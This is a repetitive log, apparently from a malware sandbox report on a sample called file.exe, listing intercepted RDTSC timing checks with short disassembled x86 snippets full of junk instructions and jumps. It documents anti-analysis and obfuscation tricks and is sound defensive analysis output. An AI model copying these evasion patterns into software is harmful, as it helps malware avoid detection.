Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29D9A second address: A29DA3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29DA3 second address: A29DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 mov di, 64CCh 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push esi 0x00000013 mov dword ptr [ebp+1246299Bh], ebx 0x00000019 pop edi 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov bx, cx 0x00000024 mov eax, dword ptr [ebp+122D0DF9h] 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F44646ECA48h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 push FFFFFFFFh 0x00000046 nop 0x00000047 pushad 0x00000048 push esi 0x00000049 jo 00007F44646ECA46h 0x0000004f pop esi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29DFC second address: A29E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2AEA9 second address: A2AEAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A36BC0 second address: A36BD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A36DFB second address: 85FBFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F44646ECA46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 477D4387h 0x00000015 jmp 00007F44646ECA53h 0x0000001a push dword ptr [ebp+122D1249h] 0x00000020 cld 0x00000021 call dword ptr [ebp+122D1DB4h] 0x00000027 pushad 0x00000028 or dword ptr [ebp+122D1FF1h], ecx 0x0000002e xor eax, eax 0x00000030 jp 00007F44646ECA59h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a stc 0x0000003b mov dword ptr [ebp+122D2CE4h], eax 0x00000041 mov dword ptr [ebp+122D1D8Fh], eax 0x00000047 mov esi, 0000003Ch 0x0000004c sub dword ptr [ebp+122D2593h], ebx 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 jmp 00007F44646ECA58h 0x0000005b cmc 0x0000005c lodsw 0x0000005e jmp 00007F44646ECA4Eh 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 pushad 0x00000068 mov dword ptr [ebp+122D1FF1h], ebx 0x0000006e mov ah, E4h 0x00000070 popad 0x00000071 jns 00007F44646ECA47h 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b mov dword ptr [ebp+122D24C0h], edi 0x00000081 nop 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CB032 second address: 9CB04C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4465131BD6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CB04C second address: 9CB052 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DF42 second address: A3DF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DF46 second address: A3DF83 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F44646ECA53h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F44646ECA4Fh 0x00000014 jmp 00007F44646ECA51h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E12D second address: A3E158 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4465131BC6h 0x00000008 jo 00007F4465131BC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F4465131BD4h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E2F9 second address: A3E301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E447 second address: A3E44D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E85D second address: A3E863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E863 second address: A3E86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E86C second address: A3E872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E872 second address: A3E8CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F4465131BD0h 0x0000000e pop edi 0x0000000f push ecx 0x00000010 ja 00007F4465131BC6h 0x00000016 pop ecx 0x00000017 popad 0x00000018 pushad 0x00000019 jns 00007F4465131BF0h 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EB6E second address: A3EB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnp 00007F44646ECA46h 0x0000000f jg 00007F44646ECA46h 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007F44646ECA51h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EB97 second address: A3EBBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4465131BCCh 0x0000000e jno 00007F4465131BC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A47964 second address: A47968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4683E second address: A46842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46842 second address: A4687D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F44646ECA52h 0x0000000d pushad 0x0000000e jmp 00007F44646ECA4Eh 0x00000013 jmp 00007F44646ECA50h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4687D second address: A46886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46886 second address: A46890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F44646ECA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46890 second address: A468A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46BD8 second address: A46BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F44646ECA53h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46BEF second address: A46C2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F4465131BCFh 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 ja 00007F4465131BC8h 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46C2A second address: A46C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46C30 second address: A46C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46C36 second address: A46C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46C40 second address: A46C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4465131BCBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46239 second address: A4623E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4623E second address: A46277 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4465131BDDh 0x00000008 jmp 00007F4465131BD7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F4465131BD4h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A46277 second address: A4627D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4627D second address: A4628C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4465131BC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4628C second address: A46290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1383B second address: A1383F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A471F6 second address: A471FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A471FC second address: A47200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A47200 second address: A47206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A47206 second address: A47211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4465131BC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A47211 second address: A47217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0FA36 second address: 9F8331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jl 00007F4465131BC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F4465131BC8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b sub ecx, 0D2EC659h 0x00000031 lea eax, dword ptr [ebp+12483776h] 0x00000037 mov edi, dword ptr [ebp+122D205Bh] 0x0000003d nop 0x0000003e push edx 0x0000003f push eax 0x00000040 push eax 0x00000041 pop eax 0x00000042 pop eax 0x00000043 pop edx 0x00000044 push eax 0x00000045 jmp 00007F4465131BD4h 0x0000004a nop 0x0000004b and edx, 5AFFDC8Dh 0x00000051 call dword ptr [ebp+122D1FAEh] 0x00000057 pushad 0x00000058 jmp 00007F4465131BCBh 0x0000005d jmp 00007F4465131BD6h 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 jnl 00007F4465131BC6h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0FB74 second address: A0FB7E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F44646ECA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1040D second address: A10413 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A108C9 second address: A108CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10AF9 second address: A10B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 push esi 0x0000000a sbb di, 418Bh 0x0000000f pop ecx 0x00000010 lea eax, dword ptr [ebp+124837BAh] 0x00000016 pushad 0x00000017 mov ebx, 56D99105h 0x0000001c mov ecx, 20A8614Eh 0x00000021 popad 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 pushad 0x00000027 popad 0x00000028 pop eax 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10B22 second address: A10B53 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F44646ECA58h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F44646ECA4Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10B53 second address: A10BAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D2586h] 0x00000015 push esi 0x00000016 stc 0x00000017 pop ecx 0x00000018 lea eax, dword ptr [ebp+12483776h] 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F4465131BC8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov edx, dword ptr [ebp+122D2521h] 0x0000003e and cx, 42CFh 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 push ebx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 pop ebx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10BAE second address: 9F8E18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F44646ECA4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F44646ECA4Dh 0x00000010 nop 0x00000011 mov edx, 42523BD1h 0x00000016 call dword ptr [ebp+1244E8ADh] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jnc 00007F44646ECA46h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8E18 second address: 9F8E22 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8E22 second address: 9F8E27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8E27 second address: 9F8E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4465131BC6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4465131BD0h 0x00000014 push ecx 0x00000015 jmp 00007F4465131BD8h 0x0000001a pushad 0x0000001b popad 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4B439 second address: A4B456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F44646ECA57h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4B456 second address: A4B478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F4465131BC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jp 00007F4465131BE0h 0x00000013 pushad 0x00000014 jo 00007F4465131BC6h 0x0000001a jne 00007F4465131BC6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4B478 second address: A4B47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4B5C5 second address: A4B5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4465131BC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4BA17 second address: A4BA30 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F44646ECA4Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4BA30 second address: A4BA36 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4BA36 second address: A4BA3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1A34 second address: 9D1A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51882 second address: A518D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F44646ECA46h 0x0000000b ja 00007F44646ECA46h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 js 00007F44646ECA46h 0x0000001c pop eax 0x0000001d jmp 00007F44646ECA4Dh 0x00000022 pushad 0x00000023 jnl 00007F44646ECA46h 0x00000029 push eax 0x0000002a pop eax 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e jl 00007F44646ECA46h 0x00000034 jmp 00007F44646ECA56h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A518D4 second address: A518D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51BC4 second address: A51BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jo 00007F44646ECA46h 0x00000010 pop eax 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F44646ECA4Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51BE0 second address: A51BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BCAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D71 second address: A51D88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D88 second address: A51D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4465131BC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D92 second address: A51D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D96 second address: A51D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D9C second address: A51DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5204D second address: A52060 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4465131BCEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A521B6 second address: A521BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A521BC second address: A521C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A567D3 second address: A567D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A567D7 second address: A567F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4465131BD5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A567F4 second address: A567FE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CCA40 second address: 9CCA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CCA44 second address: 9CCA51 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59888 second address: A598A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5924D second address: A59251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59535 second address: A5953B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5953B second address: A59558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA59h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59558 second address: A5958B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F4465131BCEh 0x0000000f jnc 00007F4465131BC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5958B second address: A59591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59591 second address: A595B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jp 00007F4465131BC8h 0x0000000e jmp 00007F4465131BCCh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
